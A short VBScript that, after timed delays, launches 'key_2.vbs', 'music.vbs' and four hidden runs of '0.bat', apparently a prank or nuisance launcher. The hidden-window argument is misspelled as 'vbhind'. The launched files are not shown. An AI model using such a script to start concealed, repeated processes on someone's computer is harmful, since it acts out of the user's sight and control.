set ws=WScript.CreateObject("WScript.Shell")
wscript.sleep 30000
ws.run "key_2.vbs"
wscript.sleep 30000
ws.run "music.vbs"
wscript.sleep 15000
wscript.sleep 15000
ws.Run "0.bat",vbhind
ws.Run "0.bat",vbhind
ws.Run "0.bat",vbhind
ws.Run "0.bat",vbhind